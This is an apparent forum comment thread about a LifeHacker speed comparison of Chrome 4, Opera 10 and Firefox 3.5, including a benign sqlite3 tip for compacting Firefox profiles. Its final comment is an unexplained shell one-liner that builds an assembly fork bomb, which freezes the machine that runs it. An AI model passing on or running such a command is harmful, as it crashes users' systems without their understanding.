Chrome 4.0 Vs. Opera 10 Vs. Firefox 3.5
Jim Karter writes "In a three-way cage match, LifeHacker threw Chrome 4, Firefox 3.5, and Opera 10 into the ring and let the three browsers duke it out to see which would emerge as the fastest app for surfing the web. Quoting: 'Like all our previous speed tests, this one is unscientific, but thorough. We install the most current versions of each browser being tested — in this case, Opera 10, Chrome's development channel 4.0 version, and the final Firefox 3.5 with security fixes — in a system with a 2.0 GHz Intel Centrino Duo processor and 2GB of RAM, running Windows XP.'"
Safari is in the test. It's just that they focused on the three new kids on the block, of which safari 4 is not among.
TFA does list results of Safari and IE, as well as other browsers, for every test in a separate graph.
Google Chrome 4.0? I just one hour ago upgraded to latest Google Chrome beta of coming 3.0 version from Google labs. (3.0.195.10). If 3.0 has not come yet out, how can they test 4.0?
I made a bee line to the memory tests and based on my browsing habits, Firefox is the winner.
It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
Agreed. How many more stories about browser-speed do we need, given how insignificant the discrepancies are? For most end-users, browser lag is completely dwarfed by restricted bandwidth.
In my case, judicious application of AdBlock and NoScript make this a complete non-issue. I'm far more interested in standards compliancy and security.
Meta will eat itself
Well no shit Sherlock ... how long does it take to render an empty page ?
on Unix, anyway. Exit Firefox, then do:
for i in ~/.mozilla/firefox/*.default/*.sqlite; do sqlite3 $i "vacuum;" ; done
FF3.x does everything in sqlite. Some of the tables fill with crap 'cos deleted rows are marked "deleted" rather than actually being deleted and compacted. I hope future versions will run a vacuum automatically every now and then.
On this Ubuntu 9.04 box I had to apt-get install sqlite3.
http://rocknerd.co.uk
Back in the old days we used to eat people who did that so that the knowledge they had gained unnaturally could be shared amongst the whole tribe. Now people have gone soft. Still one day the old ways will return.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;